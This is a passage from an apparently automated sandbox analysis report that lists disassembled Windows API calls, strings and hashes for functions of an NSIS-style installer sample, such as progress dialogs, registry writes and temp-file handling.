                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                            • Part of subcall function 00402CFE: MulDiv.KERNEL32(0001E4F1,?,00023D98), ref: 00402D13
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                                          • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                          • Opcode Fuzzy Hash: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                                          • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                          • GetMessagePos.USER32 ref: 00404ADF
                                                          • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                          • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                          • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401D44
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                          • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID: Times New Roman
                                                          • API String ID: 3808545654-927190056
                                                          • Opcode ID: 328d0a0e3b8fd706af101f3e54d1a8063c16bff27e2a5ea666199fad01018b80
                                                          • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                          • Opcode Fuzzy Hash: 328d0a0e3b8fd706af101f3e54d1a8063c16bff27e2a5ea666199fad01018b80
                                                          • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                          • wsprintfW.USER32 ref: 00402CD1
                                                          • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 1451636040-1158693248
                                                          • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                          • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
                                                          • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                          • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                          • GlobalAlloc.KERNEL32(?), ref: 10002397
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1608943585.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000000.00000002.1608921207.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 00000000.00000002.1608963992.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 00000000.00000002.1609013607.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                          • String ID:
                                                          • API String ID: 4216380887-0
                                                          • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                          • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                          • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                          • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                          APIs
                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                          • GlobalFree.KERNEL32(?), ref: 10002572
                                                          • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1608943585.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000000.00000002.1608921207.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 00000000.00000002.1608963992.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 00000000.00000002.1609013607.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                          • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                          • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                          • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                          APIs
                                                          • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                          • wsprintfW.USER32 ref: 00404A70
                                                          • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$&B
                                                          • API String ID: 3540041739-2907463167
                                                          • Opcode ID: caf30eb243818e554a1bc62297d78279ecb515a66f5f6d95e05013f04c063739
                                                          • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                          • Opcode Fuzzy Hash: caf30eb243818e554a1bc62297d78279ecb515a66f5f6d95e05013f04c063739
                                                          • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateValuelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp
                                                          • API String ID: 1356686001-305309274
                                                          • Opcode ID: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                          • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                                          • Opcode Fuzzy Hash: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                          • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1608943585.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000000.00000002.1608921207.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 00000000.00000002.1608963992.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 00000000.00000002.1609013607.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: FreeGlobal
                                                          • String ID:
                                                          • API String ID: 2979337801-0
                                                          • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                          • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                          • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                          • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                          • GlobalAlloc.KERNEL32(?,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1608943585.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000000.00000002.1608921207.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 00000000.00000002.1608963992.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 00000000.00000002.1609013607.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                          • String ID:
                                                          • API String ID: 1148316912-0
                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                          • DeleteObject.GDI32(00000000), ref: 00401D36
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                          • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                          • Opcode Fuzzy Hash: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                          • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                          • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                          • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                          • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00405999
                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 004059A3
                                                          • lstrcatW.KERNEL32(?,00409014), ref: 004059B5
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405993
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-4083868402
                                                          • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                          • Instruction ID: a3647a5b8e032715a8ecc0c41ac115d98c53e42c85c632df021e5d83325ae185
                                                          • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                          • Instruction Fuzzy Hash: 74D0A731101930AAD212BB548C04DDF739CEE45301740407BF605B30A1C77C1D418BFD
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                          • GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F39
                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                          • String ID:
                                                          • API String ID: 1404258612-0
                                                          • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                          • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                          • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                          • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                          APIs
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
